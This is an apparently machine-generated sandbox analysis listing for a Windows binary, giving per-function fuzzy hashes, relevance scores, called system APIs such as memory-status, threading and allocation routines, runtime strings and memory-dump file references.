Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d2ca5f27438bd89361a9156388e0af39218db2cec3ca48ff5751e1822049a4
Instruction ID: 88a55f7ea493194129f6cbed646855243f9a6270374a8b3860da798755eb7835
Opcode Fuzzy Hash: 93d2ca5f27438bd89361a9156388e0af39218db2cec3ca48ff5751e1822049a4
Instruction Fuzzy Hash: 6F52BA61A0878282EB94EB15E490275E792FF45794F94463AC97D6F7E4DE3CE08483F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F2C20 Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: 2f61628e43d401c79d5503da0bcc1aa3a4ce60e2d43cb57c6529fefece091fb3
Instruction ID: 27efb510c2ede65286a4ff8762a29a4021c83c73f01844d918a0ebd4575e944d
Opcode Fuzzy Hash: 2f61628e43d401c79d5503da0bcc1aa3a4ce60e2d43cb57c6529fefece091fb3
Instruction Fuzzy Hash: 33228460E1964B86FBD5EB35A480634E696EF05784F98463AC93D7F2E0DF3CB44487A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F17E0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aab992081a403925310e9fd12f166a7091f2ccfef8c5e1a787291bd1299a3cc
Instruction ID: 2b37b5fd1a6229f94465fa35936c5932cd8de2a0cbeb270c1352c72944aa2fca
Opcode Fuzzy Hash: 0aab992081a403925310e9fd12f166a7091f2ccfef8c5e1a787291bd1299a3cc
Instruction Fuzzy Hash: B1028120D19A4786F7C5FB34A941275E292AF95380FC4433AD83D7D2E2EF7CB49582A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D4260 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7F30D42CE
IsProcessInJob.KERNEL32 ref: 00007FF7F30D42DE
QueryInformationJobObject.KERNEL32 ref: 00007FF7F30D430E
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7F30D4377
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7F30D43BE
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7F30D4435

Strings

@, xrefs: 00007FF7F30D435F
@, xrefs: 00007FF7F30D43B3
@, xrefs: 00007FF7F30D442A

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: 1458fe793f73d0cfa61fd3255034cc0523ea1ccfecbde58e2ab3c3e4467f4cab
Instruction ID: 3d2808c3ebb599ee68d25cec144a53f4a7f15096cd11776f7c5f35cab61b79af
Opcode Fuzzy Hash: 1458fe793f73d0cfa61fd3255034cc0523ea1ccfecbde58e2ab3c3e4467f4cab
Instruction Fuzzy Hash: 22512131709AC186EBB19F15E4403AAB3A1FB88B50F844136CAADA7FD8DF7CD4458B54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CC8D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F30C5779), ref: 00007FF7F30CC8DB

Part of subcall function 00007FF7F30D4720: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D472F
Part of subcall function 00007FF7F30D4720: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D476D
Part of subcall function 00007FF7F30D4720: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D4799
Part of subcall function 00007FF7F30D4720: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D47AA
Part of subcall function 00007FF7F30D4720: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F30CC8FA), ref: 00007FF7F30D47B9

Part of subcall function 00007FF7F30CD980: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F30CDA7D

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F30C5779), ref: 00007FF7F30CC94A
GetProcessAffinityMask.KERNEL32 ref: 00007FF7F30CC95D
QueryInformationJobObject.KERNEL32 ref: 00007FF7F30CC9AE

Strings

PROCESSOR_COUNT, xrefs: 00007FF7F30CC916

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
String ID: PROCESSOR_COUNT
API String ID: 296690692-4048346908
Opcode ID: 6faeaf520d1afd1e5c9263b64dab5b753341e62a2aa71de75da050c32727acfa
Instruction ID: c3c9f346f16e29810b3a207e7627c79826f8330320d9f3660667e56064131ca0
Opcode Fuzzy Hash: 6faeaf520d1afd1e5c9263b64dab5b753341e62a2aa71de75da050c32727acfa
Instruction Fuzzy Hash: 4F315F71A0864296EB94FB54D4842B9F392EF443D8FC41037D66EAB6D5DF3CE40A87A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F2080 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F30D4970: VirtualAlloc.KERNELBASE ref: 00007FF7F30D4986
Part of subcall function 00007FF7F30D4970: VirtualFree.KERNELBASE ref: 00007FF7F30D499C

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F30DB50F), ref: 00007FF7F30F22EC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F30DB50F), ref: 00007FF7F30F232D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F30DB50F), ref: 00007FF7F30F2357
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF7F30DB50F), ref: 00007FF7F30F2378

Strings

PER_HEAP_ISOLATED data members initialization failed, xrefs: 00007FF7F30F24C5

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeaveVirtual$AllocFree
String ID: PER_HEAP_ISOLATED data members initialization failed
API String ID: 1836396605-1705445303
Opcode ID: cdf440fb9e53cca7cc67544d1ea2bc89a610982a624589cfda9886a174576be0
Instruction ID: f4e8c954b440ddd3e0bf8ea133e5fb0868abfb4a15811a5a6a84320fe2ba518a
Opcode Fuzzy Hash: cdf440fb9e53cca7cc67544d1ea2bc89a610982a624589cfda9886a174576be0
Instruction Fuzzy Hash: 38C11765D0C68786E790FB25E880179E7A9AF55780FC4023ED97C6E6E1CF3CA584C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30C6EF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF7F30C6ED8,?,?,?,00007FF7F31ED272,?,?,?,?,?,00007FF7F30C4B39), ref: 00007FF7F30C6F35
RaiseFailFastException.KERNEL32(?,?,?,00007FF7F30C6ED8,?,?,?,00007FF7F31ED272,?,?,?,?,?,00007FF7F30C4B39), ref: 00007FF7F30C6F61
RaiseFailFastException.KERNEL32(?,?,?,00007FF7F30C6ED8,?,?,?,00007FF7F31ED272), ref: 00007FF7F30C6F9A

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF7F30C6F86

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 9b399c8e1136877a25d74455b65c9d366a1687b6bd651fb2c43d6d5db8af5545
Instruction ID: 3df405af82af7747548eb913fb7c767431a899cefdea24e984c01d15e007f127
Opcode Fuzzy Hash: 9b399c8e1136877a25d74455b65c9d366a1687b6bd651fb2c43d6d5db8af5545
Instruction Fuzzy Hash: 7A216231A1964686E7E1FF21E440379B3A1EF04784F88403AE97D6A6D1DF3CE45282E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CCB60 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF7F30CCB81
SetThreadPriority.KERNELBASE ref: 00007FF7F30CCB9D
ResumeThread.KERNELBASE ref: 00007FF7F30CCBA6
FindCloseChangeNotification.KERNELBASE ref: 00007FF7F30CCBAF

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
String ID:
API String ID: 2150560229-0
Opcode ID: c1ae51820efb916145f94c4b900e95fb739a024f2e71c84a6de6a6ddca0c6da9
Instruction ID: 9c5c832537f5a6e6665bbfb845f378e3ea78439f0dcecbc1964aa6feee1d5170
Opcode Fuzzy Hash: c1ae51820efb916145f94c4b900e95fb739a024f2e71c84a6de6a6ddca0c6da9
Instruction Fuzzy Hash: 45E09BA9E0470142FB54AB21F81537593507F98F95F8C4035CF5E9E3D0EF3C91958690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D4080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7F30D40B7
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7F30D417C

Strings

@, xrefs: 00007FF7F30D4174

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: 9a81aefacf0331d3f1c8160c7a70ac81e939ce1a53b098b791292b37b437df5a
Instruction ID: f5b3b21eb95e92389fc895f3fcbedff6fd260411644bd97f1886ca95ecefe286
Opcode Fuzzy Hash: 9a81aefacf0331d3f1c8160c7a70ac81e939ce1a53b098b791292b37b437df5a
Instruction Fuzzy Hash: 6541E561B09B4642EB96DB3A9110339D6D36F59BC0F98C732D91E7AB84FF3CE4818650

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F3102190 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF7F30F0749,?,?,?,?,00000000,00007FF7F30E950F), ref: 00007FF7F31021D0
LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF7F30F0749,?,?,?,?,00000000,00007FF7F30E950F), ref: 00007FF7F3102246
EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF7F30F0749,?,?,?,?,00000000,00007FF7F30E950F), ref: 00007FF7F310229B
LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF7F30F0749,?,?,?,?,00000000,00007FF7F30E950F), ref: 00007FF7F31022C1

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ca1d284c392b875d9020e40ed600bf340b6f3a3ca342556000de4b753edbc3ee
Instruction ID: 0f36fe7fe7ca82e3766c558583cfcb7368e08a70904e8d4ce525e5dc125b9e13
Opcode Fuzzy Hash: ca1d284c392b875d9020e40ed600bf340b6f3a3ca342556000de4b753edbc3ee
Instruction Fuzzy Hash: 64315E61D0CA5A86EBA1FB51F480379A794FF1A340FE4453AD96D2E2D5CE6CE442C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30DEA70 Relevance: 4.7, APIs: 3, Instructions: 195
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SwitchToThread.KERNEL32 ref: 00007FF7F30DEB52
SwitchToThread.KERNEL32 ref: 00007FF7F30DEB5B

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 594086e351d99d22472ab680216929e4be2cd0274741491b1d5eafeaf822eef4
Instruction ID: 51cf1b7030885969c85ebc0775f90857bf75e40af964c799bfd24fdeb20e1356
Opcode Fuzzy Hash: 594086e351d99d22472ab680216929e4be2cd0274741491b1d5eafeaf822eef4
Instruction Fuzzy Hash: E3718C21F0920746F7E4BB55A84067AA6D2AF40754F84013AEA7E7E3D5CF3CF445C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D49B0 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7F30D7288,?,?,0000000A,00007FF7F30D62C0,?,?,00000000,00007FF7F30CF281), ref: 00007FF7F30D49D7
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7F30D7288,?,?,0000000A,00007FF7F30D62C0,?,?,00000000,00007FF7F30CF281), ref: 00007FF7F30D49F7
VirtualAllocExNuma.KERNEL32 ref: 00007FF7F30D4A18

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: ac1d7b537091b059dfc2b43afeaf83d519ce294a74938f3c6a7eb7fdd97e6444
Instruction ID: a553d16567696ed607de8b1d3537dfe688c0c9a7c97a2e4eac1183ae7e29c9b3
Opcode Fuzzy Hash: ac1d7b537091b059dfc2b43afeaf83d519ce294a74938f3c6a7eb7fdd97e6444
Instruction Fuzzy Hash: E8F0C275B0869182EB609F06F400219E760BB49FD4F884139EF9CABB9CDF3DC5928B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F312AC40 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F312AC5A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F312AC70

Part of subcall function 00007FF7F312B804: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F312B80D

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
